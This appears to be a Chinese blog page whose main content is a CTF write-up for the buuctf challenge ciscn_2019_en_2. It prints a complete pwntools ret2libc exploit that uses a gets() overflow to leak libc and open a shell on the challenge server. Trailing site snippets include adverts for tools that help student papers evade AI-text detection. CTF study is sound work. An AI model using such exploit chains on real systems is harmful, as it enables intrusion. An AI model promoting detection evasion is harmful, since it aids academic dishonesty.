news 2026/5/13 14:11:30

buuctf中的ciscn_2019_en_2

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
buuctf中的ciscn_2019_en_2

首先checksec检查保护机制:

-64位程序

-开启了栈不可执行保护

接下来使用IDA反汇编工具进行分析:

发现begin函数,点进去

begin函数内部:

输入1可用进入encrypt函数,输入2可从主函数看到并没有什么用,3是退出程序

这是encrypt函数内部:

get函数可触发栈溢出漏洞,看到这一行代码就可用了,下面的加密过程对破解程序无任何帮助。顺便算出s到栈底的偏移:0x50+0x8 = 0x58

由于在IDA中没发现任何后门函数和system函数地址,所以这里考虑泄露libc后来得到system函数和/bin/sh,这里我们需要构造ROP链来调用函数,所以还需用到ret和rdi的地址,输入以下指令:

ROPgadget --binary pwn --only "pop|ret"

rdi地址:0x400c83,ret地址:0x4006b9,q其中rdi用于调用函数,ret用于栈对齐

再在IDA中拿到encrypt地址,用于第一次泄露libc后再次进入encrypt函数:0x4009A0

基本信息拿到,可用来写exp攻击脚本了:

from pwn import * from LibcSearcher import LibcSearcher context(arch='amd64', os='linux', log_level='debug') #io = process('./pwn') # 在本地运行程序。 # gdb.attach(io) # 启动 GDB io = connect('node5.buuoj.cn',28902) # 与在线环境交互。 encrypt_addr = 0x4009A0 offset = 0x58 elf = ELF('./pwn') puts_got = elf.got['puts'] puts_plt = elf.plt['puts'] rdi_addr = 0x400c83 ret_addr = 0x4006b9 io.recvuntil(b'Input your choice!\n') io.sendline(b'1') io.recvuntil(b'Input your Plaintext to be encrypted\n') payload = b'a'*offset + p64(rdi_addr) + p64(puts_got) + p64(puts_plt) + p64(encrypt_addr) io.sendline(payload) io.recvline() io.recvline() puts_addr = u64(io.recvline().strip().ljust(8,b'\x00')) print(hex(puts_addr)) libc = LibcSearcher('puts',puts_addr) libc_base = puts_addr - libc.dump('puts') system_addr = libc_base + libc.dump('system') bin_sh_addr = libc_base + libc.dump('str_bin_sh') io.recvuntil(b'Input your Plaintext to be encrypted\n') payload = b'a'*offset + p64(ret_addr) + p64(rdi_addr) + p64(bin_sh_addr) + p64(system_addr) io.sendline(payload) io.interactive()

这是运行结果:

这里需要手动选择libc,64位程序就选64位的libc,可能会选到不适配的libc库,多试几次就可用了,拿到shell后手动输入cat flag拿到flag

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/5/1 11:12:52

Kotaemon性能基准测试:不同硬件环境下的QPS表现

Kotaemon性能基准测试:不同硬件环境下的QPS表现 在企业级AI应用快速落地的今天,一个智能客服系统能否扛住早高峰的万级并发请求,往往决定了它究竟是“生产力工具”还是“演示原型”。尤其是在金融、电信这类对响应延迟极为敏感的行业&#xf…

作者头像 李华
网站建设 2026/4/30 16:39:15

9个高效降AI率工具,本科生必看!

9个高效降AI率工具,本科生必看! AI降重工具:论文写作的“隐形助手” 在当今学术写作中,越来越多的本科生开始借助AI工具进行论文撰写。然而,随着AIGC(人工智能生成内容)检测技术的不断升级&…

作者头像 李华
网站建设 2026/5/11 12:06:22

51单片机温度报警器:从C程序到Proteus仿真全记录

51单片机温度报警器C程序、proteus仿真、报告 支持按键设置上下限温度值、当实际温度不在上下限温度值之间时、蜂鸣器报警最近玩了玩51单片机,做了个温度报警器,觉得还挺有意思,来和大家分享下整个过程,包括C程序代码、Proteus仿真…

作者头像 李华
网站建设 2026/5/11 0:48:16

10 个降AI率工具,继续教育学生必备!

10 个降AI率工具,继续教育学生必备! AI降重工具:让论文更“自然”的秘密武器 随着人工智能技术的不断发展,越来越多的学生在撰写论文时开始依赖AI工具进行内容生成。然而,这种便捷的背后也带来了新的挑战——如何有效降…

作者头像 李华
网站建设 2026/5/11 0:48:56

Java快速排序,零基础小白到精通,收藏这篇就够了

文章目录 Java实现快速排序 快速排序原理快速排序一次划分图文演示过程整个快速排序的过程具体Java代码实现简结快速排序的性能 Java实现快速排序 冲鸭,装上涡轮增鸭,开始学习快速排序算法吧!(快排也是一个递归过程噢&#x…

作者头像 李华
网站建设 2026/5/11 0:48:43

9个AI写作工具,自考论文轻松搞定!

9个AI写作工具,自考论文轻松搞定! AI写作工具如何改变自考论文的写作方式 在自考论文的撰写过程中,许多学生常常面临时间紧张、内容重复率高、逻辑结构混乱等难题。而随着AI技术的不断发展,AI写作工具逐渐成为提升论文效率和质量的…

作者头像 李华